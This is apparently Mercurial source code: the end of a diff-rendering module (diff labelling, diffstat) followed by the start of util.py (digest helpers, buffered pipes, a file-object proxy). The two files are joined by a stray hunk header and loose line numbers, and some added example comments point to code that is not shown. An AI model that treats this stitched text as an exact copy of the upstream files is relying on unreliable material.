    modified = sorted(modifiedset)
    added = sorted(addedset)
    removed = sorted(removedset)
    for dst, src in list(copy.items()):
        if src not in ctx1:
            # Files merged in during a merge and then copied/renamed are
            # reported as copies. We want to show them in the diff as additions.
            del copy[dst]

    prefetchmatch = scmutil.matchfiles(
        repo, list(modifiedset | addedset | removedset))
    scmutil.prefetchfiles(repo, [ctx1.rev(), ctx2.rev()], prefetchmatch)

    def difffn(opts, losedata):
        return trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
                       copy, getfilectx, opts, losedata, prefix, relroot)
    if opts.upgrade and not opts.git:
        try:
            def losedata(fn):
                if not losedatafn or not losedatafn(fn=fn):
                    raise GitDiffRequired
            # Buffer the whole output until we are sure it can be generated
            return list(difffn(opts.copy(git=False), losedata))
        except GitDiffRequired:
            return difffn(opts.copy(git=True), None)
    else:
        return difffn(opts, None)
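
# Example (hedged): consuming the structured output instead of flat text;
# each `hunkrange` locates the hunk in both files and `hunklines` are the
# raw "-"/"+"/" " lines (names assumed as in the sketch above):
#
#     for fctx1, fctx2, header, hunks in diffhunks(repo):
#         if header:
#             repo.ui.write('\n'.join(header) + '\n')
#         for hunkrange, hunklines in hunks:
#             repo.ui.write(''.join(hunklines))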

def diffsinglehunk(hunklines):
    """yield tokens for a list of lines in a single hunk"""
    for line in hunklines:
        # chomp
        chompline = line.rstrip('\n')
        # highlight tabs and trailing whitespace
        stripline = chompline.rstrip()
        if line.startswith('-'):
            label = 'diff.deleted'
        elif line.startswith('+'):
            label = 'diff.inserted'
        else:
            raise error.ProgrammingError('unexpected hunk line: %s' % line)
        for token in tabsplitter.findall(stripline):
            if token.startswith('\t'):
                yield (token, 'diff.tab')
            else:
                yield (token, label)

        if chompline != stripline:
            yield (chompline[len(stripline):], 'diff.trailingwhitespace')
        if chompline != line:
            yield (line[len(chompline):], '')
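
# For orientation, a hedged trace of the tokens yielded for one inserted line
# containing a tab and a trailing space (assuming tabsplitter separates runs
# of tabs from other text):
#
#     list(diffsinglehunk(['+foo\tbar \n']))
#     # [('+foo', 'diff.inserted'), ('\t', 'diff.tab'),
#     #  ('bar', 'diff.inserted'), (' ', 'diff.trailingwhitespace'),
#     #  ('\n', '')]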

def diffsinglehunkinline(hunklines):
    """yield tokens for a list of lines in a single hunk, with inline colors"""
    # prepare deleted, and inserted content
    a = ''
    b = ''
    for line in hunklines:
        if line[0] == '-':
            a += line[1:]
        elif line[0] == '+':
            b += line[1:]
        else:
            raise error.ProgrammingError('unexpected hunk line: %s' % line)
    # fast path: if either side is empty, use diffsinglehunk
    if not a or not b:
        for t in diffsinglehunk(hunklines):
            yield t
        return
    # re-split the content into words
    al = wordsplitter.findall(a)
    bl = wordsplitter.findall(b)
    # re-arrange the words to lines since the diff algorithm is line-based
    aln = [s if s == '\n' else s + '\n' for s in al]
    bln = [s if s == '\n' else s + '\n' for s in bl]
    an = ''.join(aln)
    bn = ''.join(bln)
    # run the diff algorithm, prepare atokens and btokens
    atokens = []
    btokens = []
    blocks = mdiff.allblocks(an, bn, lines1=aln, lines2=bln)
    for (a1, a2, b1, b2), btype in blocks:
        changed = btype == '!'
        for token in mdiff.splitnewlines(''.join(al[a1:a2])):
            atokens.append((changed, token))
        for token in mdiff.splitnewlines(''.join(bl[b1:b2])):
            btokens.append((changed, token))

    # yield deleted tokens, then inserted ones
    for prefix, label, tokens in [('-', 'diff.deleted', atokens),
                                  ('+', 'diff.inserted', btokens)]:
        nextisnewline = True
        for changed, token in tokens:
            if nextisnewline:
                yield (prefix, label)
                nextisnewline = False
            # special handling line end
            isendofline = token.endswith('\n')
            if isendofline:
                chomp = token[:-1] # chomp
                token = chomp.rstrip() # detect spaces at the end
                endspaces = chomp[len(token):]
            # scan tabs
            for maybetab in tabsplitter.findall(token):
                if '\t' == maybetab[0]:
                    currentlabel = 'diff.tab'
                else:
                    if changed:
                        currentlabel = label + '.changed'
                    else:
                        currentlabel = label + '.unchanged'
                yield (maybetab, currentlabel)
            if isendofline:
                if endspaces:
                    yield (endspaces, 'diff.trailingwhitespace')
                yield ('\n', '')
                nextisnewline = True

def difflabel(func, *args, **kw):
    '''yields 2-tuples of (output, label) based on the output of func()'''
    if kw.get(r'opts') and kw[r'opts'].worddiff:
        dodiffhunk = diffsinglehunkinline
    else:
        dodiffhunk = diffsinglehunk
    headprefixes = [('diff', 'diff.diffline'),
                    ('copy', 'diff.extended'),
                    ('rename', 'diff.extended'),
                    ('old', 'diff.extended'),
                    ('new', 'diff.extended'),
                    ('deleted', 'diff.extended'),
                    ('index', 'diff.extended'),
                    ('similarity', 'diff.extended'),
                    ('---', 'diff.file_a'),
                    ('+++', 'diff.file_b')]
    textprefixes = [('@', 'diff.hunk'),
                    # - and + are handled by diffsinglehunk
                   ]
    head = False

    # buffers a hunk, i.e. adjacent "-", "+" lines without other changes.
    hunkbuffer = []
    def consumehunkbuffer():
        if hunkbuffer:
            for token in dodiffhunk(hunkbuffer):
                yield token
            hunkbuffer[:] = []

    for chunk in func(*args, **kw):
        lines = chunk.split('\n')
        linecount = len(lines)
        for i, line in enumerate(lines):
            if head:
                if line.startswith('@'):
                    head = False
            else:
                if line and not line.startswith((' ', '+', '-', '@', '\\')):
                    head = True
            diffline = False
            if not head and line and line.startswith(('+', '-')):
                diffline = True

            prefixes = textprefixes
            if head:
                prefixes = headprefixes
            if diffline:
                # buffered
                bufferedline = line
                if i + 1 < linecount:
                    bufferedline += "\n"
                hunkbuffer.append(bufferedline)
            else:
                # unbuffered
                for token in consumehunkbuffer():
                    yield token
                stripline = line.rstrip()
                for prefix, label in prefixes:
                    if stripline.startswith(prefix):
                        yield (stripline, label)
                        if line != stripline:
                            yield (line[len(stripline):],
                                   'diff.trailingwhitespace')
                        break
                else:
                    yield (line, '')
                if i + 1 < linecount:
                    yield ('\n', '')
    for token in consumehunkbuffer():
        yield token

def diffui(*args, **kw):
    '''like diff(), but yields 2-tuples of (output, label) for ui.write()'''
    return difflabel(diff, *args, **kw)
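
# Example (hedged): streaming labeled output to the terminal, where the color
# machinery maps labels like 'diff.inserted' to effects (`ui` and `repo`
# assumed):
#
#     for output, label in diffui(repo, opts=diffallopts(ui)):
#         ui.write(output, label=label)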

def _filepairs(modified, added, removed, copy, opts):
    '''generates tuples (f1, f2, copyop), where f1 is the name of the file
    before and f2 is the name after. For added files, f1 will be None,
    and for removed files, f2 will be None. copyop may be set to None, 'copy'
    or 'rename' (the latter two only if opts.git is set).'''
    gone = set()

    copyto = dict([(v, k) for k, v in copy.items()])

    addedset, removedset = set(added), set(removed)

    for f in sorted(modified + added + removed):
        copyop = None
        f1, f2 = f, f
        if f in addedset:
            f1 = None
            if f in copy:
                if opts.git:
                    f1 = copy[f]
                    if f1 in removedset and f1 not in gone:
                        copyop = 'rename'
                        gone.add(f1)
                    else:
                        copyop = 'copy'
        elif f in removedset:
            f2 = None
            if opts.git:
                # have we already reported a copy above?
                if (f in copyto and copyto[f] in addedset
                    and copy[copyto[f]] == f):
                    continue
        yield f1, f2, copyop
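
# A hedged walkthrough of the generator above: with modified=['a'],
# added=['b'], removed=['c'], copy={'b': 'c'} and opts.git set, it yields
#
#     ('a', 'a', None)      # modified in place
#     ('c', 'b', 'rename')  # removal of 'c' plus addition of 'b'
#
# and the bare ('c', None, None) removal is suppressed, because it was
# already reported as the source of the rename.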

def trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
            copy, getfilectx, opts, losedatafn, prefix, relroot):
    '''given input data, generate a diff and yield it in blocks

    If generating a diff would lose data like flags or binary data and
    losedatafn is not None, it will be called.

    relroot is removed and prefix is added to every path in the diff output.

    If relroot is not empty, this function expects every path in modified,
    added, removed and copy to start with it.'''

    def gitindex(text):
        if not text:
            text = ""
        l = len(text)
        s = hashlib.sha1('blob %d\0' % l)
        s.update(text)
        return hex(s.digest())

    if opts.noprefix:
        aprefix = bprefix = ''
    else:
        aprefix = 'a/'
        bprefix = 'b/'

    def diffline(f, revs):
        revinfo = ' '.join(["-r %s" % rev for rev in revs])
        return 'diff %s %s' % (revinfo, f)

    def isempty(fctx):
        return fctx is None or fctx.size() == 0

    date1 = dateutil.datestr(ctx1.date())
    date2 = dateutil.datestr(ctx2.date())

    gitmode = {'l': '120000', 'x': '100755', '': '100644'}

    if relroot != '' and (repo.ui.configbool('devel', 'all-warnings')
                          or repo.ui.configbool('devel', 'check-relroot')):
        for f in modified + added + removed + list(copy) + list(copy.values()):
            if f is not None and not f.startswith(relroot):
                raise AssertionError(
                    "file %s doesn't start with relroot %s" % (f, relroot))

    for f1, f2, copyop in _filepairs(modified, added, removed, copy, opts):
        content1 = None
        content2 = None
        fctx1 = None
        fctx2 = None
        flag1 = None
        flag2 = None
        if f1:
            fctx1 = getfilectx(f1, ctx1)
            if opts.git or losedatafn:
                flag1 = ctx1.flags(f1)
        if f2:
            fctx2 = getfilectx(f2, ctx2)
            if opts.git or losedatafn:
                flag2 = ctx2.flags(f2)
        # if binary is True, output "summary" or "base85", but not "text diff"
        if opts.text:
            binary = False
        else:
            binary = any(f.isbinary() for f in [fctx1, fctx2] if f is not None)

        if losedatafn and not opts.git:
            if (binary or
                # copy/rename
                f2 in copy or
                # empty file creation
                (not f1 and isempty(fctx2)) or
                # empty file deletion
                (isempty(fctx1) and not f2) or
                # create with flags
                (not f1 and flag2) or
                # change flags
                (f1 and f2 and flag1 != flag2)):
                losedatafn(f2 or f1)

        path1 = f1 or f2
        path2 = f2 or f1
        path1 = posixpath.join(prefix, path1[len(relroot):])
        path2 = posixpath.join(prefix, path2[len(relroot):])
        header = []
        if opts.git:
            header.append('diff --git %s%s %s%s' %
                          (aprefix, path1, bprefix, path2))
            if not f1: # added
                header.append('new file mode %s' % gitmode[flag2])
            elif not f2: # removed
                header.append('deleted file mode %s' % gitmode[flag1])
            else:  # modified/copied/renamed
                mode1, mode2 = gitmode[flag1], gitmode[flag2]
                if mode1 != mode2:
                    header.append('old mode %s' % mode1)
                    header.append('new mode %s' % mode2)
                if copyop is not None:
                    if opts.showsimilarity:
                        sim = similar.score(ctx1[path1], ctx2[path2]) * 100
                        header.append('similarity index %d%%' % sim)
                    header.append('%s from %s' % (copyop, path1))
                    header.append('%s to %s' % (copyop, path2))
        elif revs and not repo.ui.quiet:
            header.append(diffline(path1, revs))

        #  fctx.is  | diffopts                | what to   | is fctx.data()
        #  binary() | text nobinary git index | output?   | outputted?
        # ------------------------------------|----------------------------
        #  yes      | no   no       no  *     | summary   | no
        #  yes      | no   no       yes *     | base85    | yes
        #  yes      | no   yes      no  *     | summary   | no
        #  yes      | no   yes      yes 0     | summary   | no
        #  yes      | no   yes      yes >0    | summary   | semi [1]
        #  yes      | yes  *        *   *     | text diff | yes
        #  no       | *    *        *   *     | text diff | yes
        # [1]: hash(fctx.data()) is outputted. so fctx.data() cannot be faked
        if binary and (not opts.git or (opts.git and opts.nobinary and not
                                        opts.index)):
            # fast path: no binary content will be displayed, content1 and
            # content2 are only used for equivalent test. cmp() could have a
            # fast path.
            if fctx1 is not None:
                content1 = b'\0'
            if fctx2 is not None:
                if fctx1 is not None and not fctx1.cmp(fctx2):
                    content2 = b'\0' # not different
                else:
                    content2 = b'\0\0'
        else:
            # normal path: load contents
            if fctx1 is not None:
                content1 = fctx1.data()
            if fctx2 is not None:
                content2 = fctx2.data()

        if binary and opts.git and not opts.nobinary:
            text = mdiff.b85diff(content1, content2)
            if text:
                header.append('index %s..%s' %
                              (gitindex(content1), gitindex(content2)))
            hunks = (None, [text]),
        else:
            if opts.git and opts.index > 0:
                flag = flag1
                if flag is None:
                    flag = flag2
                header.append('index %s..%s %s' %
                              (gitindex(content1)[0:opts.index],
                               gitindex(content2)[0:opts.index],
                               gitmode[flag]))

            uheaders, hunks = mdiff.unidiff(content1, date1,
                                            content2, date2,
                                            path1, path2,
                                            binary=binary, opts=opts)
            header.extend(uheaders)
        yield fctx1, fctx2, header, hunks

def diffstatsum(stats):
    maxfile, maxtotal, addtotal, removetotal, binary = 0, 0, 0, 0, False
    for f, a, r, b in stats:
        maxfile = max(maxfile, encoding.colwidth(f))
        maxtotal = max(maxtotal, a + r)
        addtotal += a
        removetotal += r
        binary = binary or b

    return maxfile, maxtotal, addtotal, removetotal, binary

def diffstatdata(lines):
    diffre = re.compile('^diff .*-r [a-z0-9]+\s(.*)$')

    results = []
    filename, adds, removes, isbinary = None, 0, 0, False

    def addresult():
        if filename:
            results.append((filename, adds, removes, isbinary))

    # inheader is used to track if a line is in the
    # header portion of the diff. This helps properly account
    # for lines that start with '--' or '++'
    inheader = False

    for line in lines:
        if line.startswith('diff'):
            addresult()
            # starting a new file diff
            # set numbers to 0 and reset inheader
            inheader = True
            adds, removes, isbinary = 0, 0, False
            if line.startswith('diff --git a/'):
                filename = gitre.search(line).group(2)
            elif line.startswith('diff -r'):
                # format: "diff -r ... -r ... filename"
                filename = diffre.search(line).group(1)
        elif line.startswith('@@'):
            inheader = False
        elif line.startswith('+') and not inheader:
            adds += 1
        elif line.startswith('-') and not inheader:
            removes += 1
        elif (line.startswith('GIT binary patch') or
              line.startswith('Binary file')):
            isbinary = True
    addresult()
    return results

def diffstat(lines, width=80):
    output = []
    stats = diffstatdata(lines)
    maxname, maxtotal, totaladds, totalremoves, hasbinary = diffstatsum(stats)

    countwidth = len(str(maxtotal))
    if hasbinary and countwidth < 3:
        countwidth = 3
    graphwidth = width - countwidth - maxname - 6
    if graphwidth < 10:
        graphwidth = 10

    def scale(i):
        if maxtotal <= graphwidth:
            return i
        # If diffstat runs out of room it doesn't print anything,
        # which isn't very useful, so always print at least one + or -
        # if there were at least some changes.
        return max(i * graphwidth // maxtotal, int(bool(i)))

    for filename, adds, removes, isbinary in stats:
        if isbinary:
            count = 'Bin'
        else:
            count = '%d' % (adds + removes)
        pluses = '+' * scale(adds)
        minuses = '-' * scale(removes)
        output.append(' %s%s | %*s %s%s\n' %
                      (filename, ' ' * (maxname - encoding.colwidth(filename)),
                       countwidth, count, pluses, minuses))

    if stats:
        output.append(_(' %d files changed, %d insertions(+), '
                        '%d deletions(-)\n')
                      % (len(stats), totaladds, totalremoves))

    return ''.join(output)
2932
2933
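
# The rendered form looks roughly like this (a sketch; the exact padding
# depends on the terminal width and the computed column sizes):
#
#      foo |  3 ++-
#      1 files changed, 2 insertions(+), 1 deletions(-)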

def diffstatui(*args, **kw):
    '''like diffstat(), but yields 2-tuples of (output, label) for
    ui.write()
    '''

    for line in diffstat(*args, **kw).splitlines():
        if line and line[-1] in '+-':
            name, graph = line.rsplit(' ', 1)
            yield (name + ' ', '')
            m = re.search(br'\++', graph)
            if m:
                yield (m.group(0), 'diffstat.inserted')
            m = re.search(br'-+', graph)
            if m:
                yield (m.group(0), 'diffstat.deleted')
        else:
            yield (line, '')
        yield ('\n', '')
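
# For a graph line such as ' foo |  3 ++-', diffstatui() would yield roughly
# (a sketch):
#
#     (' foo |  3 ', ''), ('++', 'diffstat.inserted'),
#     ('-', 'diffstat.deleted'), ('\n', '')
#
# so that color extensions can label the '+' and '-' runs independently.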
@@ -1,3789 +1,3790 b''
# util.py - Mercurial utility functions and platform specific implementations
#
#  Copyright 2005 K. Thananchayan <thananck@yahoo.com>
#  Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#  Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def _rapply(f, xs):
    if xs is None:
        # assume None means non-value of optional data
        return xs
    if isinstance(xs, (list, set, tuple)):
        return type(xs)(_rapply(f, x) for x in xs)
    if isinstance(xs, dict):
        return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
    return f(xs)

def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits
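
# bitsfrom() just ORs an iterable of flag bits together; for example:
#
#     bitsfrom([stat.S_IRUSR, stat.S_IWUSR]) == stat.S_IRUSR | stat.S_IWUSR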

# python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect if we are running
# tests and only use python deprecation warnings in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
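
# A hypothetical call site (sketch): point the warning at the caller of the
# deprecated helper, not at this module, by bumping stacklevel.
#
#     nouideprecwarn(b"use the replacement API instead", b"4.7", stacklevel=2)
#
# With HGEMITWARNINGS unset (i.e. outside the test suite) this is a no-op.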

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))
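
# A minimal validation sketch (the size and hex digest are placeholders):
#
#     checked = digestchecker(fh, expectedsize, {'sha1': expectedhexdigest})
#     while checked.read(2 ** 20):
#         pass
#     checked.validate()  # raises error.Abort on a size or digest mismatch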

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
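
# On Python 2 the builtin buffer() is kept as-is; on Python 3 the fallback
# above returns a memoryview slice with the same (offset, length) semantics:
#
#     buffer(b'abcdef', 2, 3)  # a zero-copy view over b'cde'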

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
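
# Sketch of the intended collaboration with polling (assumed caller code):
# drain the internal buffer first and only poll the descriptor when
# hasbuffer is False, since select()/poll() cannot see data that is already
# buffered in userspace.
#
#     pipe = bufferedinputpipe(proc.stdout)
#     if not pipe.hasbuffer:
#         poll([pipe.fileno()])
#     line = pipe.readline()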

def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
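
# Usage sketch ('path' is a placeholder): map a file for cheap random access;
# thanks to the empty-file fallback above, callers can slice the result the
# same way whether or not the file had any content.
#
#     with open(path, 'rb') as fp:
#         data = mmapread(fp)
#         header = data[:4]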

class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

